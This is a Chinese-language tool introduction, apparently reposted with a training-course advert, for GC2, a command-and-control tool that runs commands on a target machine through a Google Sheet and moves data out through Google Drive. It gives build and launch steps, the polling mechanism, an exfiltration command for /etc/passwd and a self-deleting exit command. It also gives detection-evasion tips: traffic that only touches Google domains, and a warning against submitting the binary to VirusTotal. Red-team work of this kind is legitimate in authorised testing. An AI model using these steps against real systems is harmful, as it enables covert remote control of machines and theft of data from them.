關于GC2

　　GC2是一款功能強大的命令控制應用工具，該工具將允許廣大安全研究人員或滲透測試人員使用Google Sheet來在目標設備上執行遠程控制命令，并使用Google Drive來提取目標設備中的敏感數據。

　　值得一提的是，該工具可以直接提供命令控制服務，而無需進行其他額外的安裝和配置，因此可以大大提高紅隊滲透活動的效率。除此之外，這款工具只能跟Google的域名(*.google.com)交互，因此也增加了檢測GC2的難度。

　　請注意：千萬不要將已編譯好的代碼上傳到VirusTotal上!

　　功能介紹

　　使用Google Sheet作為終端窗口來實現命令控制與命令執行。

　　使用Google Drive向目標主機傳輸和下載文件。

　　使用Google Drive從目標主機中提取數據。

　　退出執行。

　　工具運行流程

　　工具安裝&配置

　　第一步：使用下列命令將該項目源碼克隆至本地，然后構建項目代碼：

　　git clone https://github.com/looCiprian/GC2-sheet

　　cd GC2-sheet

　　go build gc2-sheet.go

　　第二步：創建一個新的Google “服務賬號”，此時我們需要點擊https://console.cloud.google.com/來創建該服務賬號所需的.json密鑰文件。

　　第三步：啟用Google Sheet API和Google Drive API。

　　第四步：配置Google Sheet和Google Drive。創建一個新的Google Sheet，并添加服務賬號至spreadsheet的Editor組：

　　創建一個新的Google Drive文件夾，并將服務賬號添加進這個文件夾的Editor組中：

　　第五步：使用下列命令啟動GC2：

　　gc2-sheet --key--sheet--drive

　　注意事項：你可以將參數以硬編碼的形式寫入進代碼中，并只將可執行程序上傳至目標設備上。

　　工具使用

　　命令執行

　　GC2每五秒會向spreadsheet發送一次請求，并檢查是否存在未執行的新命令。命令必須插入值請求中的“A”字段記錄中，而命令輸出結果將存儲在“B”字段中。

　　數據提取

　　我們可以使用指定的命令來在目標設備上執行文件上傳或下載任務：

　　From Target to Google Drive

　　upload;

　　Example:

　　upload;/etc/passwd

　　下載文件

　　我們可以使用指定的命令來在目標設備上執行文件上傳或下載任務：

　　From Google Drive to Target

　　download;;

　　Example:

　　download;;/home/user/downloaded.txt

　　退出執行

　　通過發送“exit”命令，GC2將會從目標設備上遠程刪除自身代碼，并終止自身進程的運行。注意，如果開啟進程時使用了符號鏈接，那么命令執行結果可能會是符號鏈接或路徑所指向的目標，從而導致刪除錯誤的目標。

　　項目地址

　　https://github.com/looCiprian/GC2-sheet

　　更多關于“網絡安全培訓”的問題，歡迎咨詢千鋒教育在線名師。千鋒教育多年辦學，課程大綱緊跟企業需求，更科學更嚴謹，每年培養泛IT人才近2萬人。不論你是零基礎還是想提升，都可以找到適合的班型，千鋒教育隨時歡迎你來試聽。